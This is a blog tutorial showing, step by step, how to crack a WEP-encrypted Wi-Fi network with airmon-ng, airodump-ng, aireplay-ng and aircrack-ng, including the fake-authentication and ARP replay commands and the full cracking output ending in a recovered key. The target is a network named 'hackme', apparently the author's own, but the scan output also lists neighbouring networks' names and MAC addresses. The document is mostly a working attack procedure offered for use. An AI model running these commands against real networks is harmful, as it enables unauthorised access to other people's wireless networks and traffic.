Wireless Hacking - WEP

I'm cleaning up my old blog, and transitioning to the new. So I've decided to update a few posts.

Backtrack 4 just released the final version, so I decided to break in my netbook.

My netbook obviously doesn't have a cd-rom drive, so I had to put the Backtrack iso file onto a flash drive with UNetbootin.

I have a Hawking HWUG1 usb wifi card that I'll be using for this tutorial.

First off, we'll start by putting the card into monitor mode:

airmon-ng start wlan0

Interface       Chipset         Driver

wlan0           Ralink 2573 USB rt73usb - [phy6]
                                (monitor mode enabled on mon0)

From now on, we'll be using the interface mon0. Now, lets do a scan of the local wireless networks to see which one we'd like to hack.

airodump-ng mon0

CH  9 ][ BAT: 1 hour 58 mins ][ Elapsed: 20 s ][ 2010-02-07 21:13

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:22:75:13:C0:19   -1        0        2    0 128  -1   OPN
 02:22:3F:95:2B:09  -39       22        0    0   9  54e  WEP  WEP         hackme
 00:22:3F:95:2B:08  -41       23        1    0   9  54e  WPA2 TKIP   PSK  ipson2
 00:23:69:3A:A3:23  -70       15        0    0   1  54e  WPA2 CCMP   PSK  computer
 00:23:69:9D:92:78  -78       12        0    0   6  54   WPA2 CCMP   PSK  sullivans
 00:23:69:87:CA:9A  -78       13        0    0   6  54   WPA2 CCMP   PSK  The Horde
 00:73:07:0D:5E:D9  -81       11        0    0  11  54   WPA  TKIP   PSK  UBTAnet-DSL
 00:1E:E3:EA:3A:F2  -81       10        0    0  11  54   WPA  TKIP   PSK  kmiller

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:22:75:13:C0:19  00:16:6F:37:76:7D  -81    0 - 1     30       30
 00:22:3F:95:2B:08  00:23:69:3D:B1:82   -1   54e- 0      0        1
 00:22:3F:95:2B:08  00:1F:3B:70:06:CD  -47    0 -12e     0        6
 00:23:69:87:CA:9A  00:23:32:55:63:D6  -71    0 -11     31       15  The Horde

We are going to crack the network "hackme". We are going to need to do a few things: Run airodump-ng again and save what we capture to a file, Run a replay attack against the AP so we aren't sitting here all day waiting for packets to come in, and then hack the WEP key. So here we go...

airodump-ng mon0 -c 9 -w wephack --bssid 02:22:3F:95:2B:09

-c specifies what channel the AP is on. -w specifies what file you want it saved as. --bssid specifies the mac address of the AP. This will be a similar result to what we got earlier, just trimmed down a lot. Go ahead a open a new terminal tab or window, and run the following command:

aireplay-ng -1 1 -a 02:22:3F:95:2B:09 mon0

This is going to create a false authentication with the AP. Just make sure that the mac address after the -a is the same one you used in the last step. Let this command run for about 10 seconds or so, then go ahead and push Ctrl-C to kill it. In the same terminal window, run this command:

aireplay-ng -3 -b 02:22:3F:95:2B:09 mon0

This is going to run the replay attack. It will look something like this:

No source MAC (-h) specified. Using the device MAC (00:0E:3B:0A:12:12)
23:33:43  Waiting for beacon frame (BSSID: 02:22:3F:95:2B:09) on channel 9
Saving ARP requests in replay_arp-0207-233343.cap
You should also start airodump-ng to capture replies.
^Cad 276756 packets (got 74451 ARP requests and 37670 ACKs), sent 43323 packets...(499 pps)

Then in another tab, run aircrack-ng against the capture file being created by airodump-ng.

aircrack-ng -P 2 wephack-01.cap

This will run the attack while the capture file is still being made. This makes it as fast to crack the password as possible. Here is the final result:

Opening wephack-01.cap
Read 62107 packets.

   #  BSSID              ESSID                     Encryption

   1  02:22:3F:95:2B:09  hackme                    WEP (224 IVs)

Choosing first network as target.

Opening wephack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 224 ivs.
Failed. Next try with 5000 IVs.
Starting PTW attack with 5011 ivs.
Failed. Next try with 10000 IVs.
Starting PTW attack with 10007 ivs.
Failed. Next try with 15000 IVs.
Starting PTW attack with 15008 ivs.
Failed. Next try with 20000 IVs.
Starting PTW attack with 20052 ivs.
Failed. Next try with 25000 IVs.
Starting PTW attack with 25050 ivs.
Failed. Next try with 30000 IVs.
Starting PTW attack with 30040 ivs.
Failed. Next try with 35000 IVs.
Starting PTW attack with 35007 ivs.
Failed. Next try with 40000 IVs.
Starting PTW attack with 40004 ivs.
Failed. Next try with 45000 IVs.
Starting PTW attack with 45069 ivs.
Failed. Next try with 50000 IVs.
Starting PTW attack with 50039 ivs.
Failed. Next try with 55000 IVs.
Starting PTW attack with 55012 ivs.
Failed. Next try with 60000 IVs.
Starting PTW attack with 60044 ivs.
Failed. Next try with 65000 IVs.
Starting PTW attack with 65004 ivs.
Failed. Next try with 70000 IVs.
Starting PTW attack with 70026 ivs.
                         KEY FOUND! [ 03:1A:B0:3D:F4 ]
        Decrypted correctly: 100%

So how long did this take? Take a look at the airodump-ng window:

 CH  9 ][ Elapsed: 3 mins ][ 2010-02-07 23:35

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:22:3F:95:2B:09  -46   0     1829    75262  744   9  54e  WEP  WEP    OPN  hackme

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 02:22:3F:95:2B:09  00:0E:3B:0A:12:12    0    0 - 1   408245    94088
 02:22:3F:95:2B:09  00:26:08:E9:93:F4  -45   54e-54e     0    44157
 02:22:3F:95:2B:09  00:26:08:E9:93:F4  -45   54e-54e   319    47597

3 Minutes! That's how easy WEP cracking is!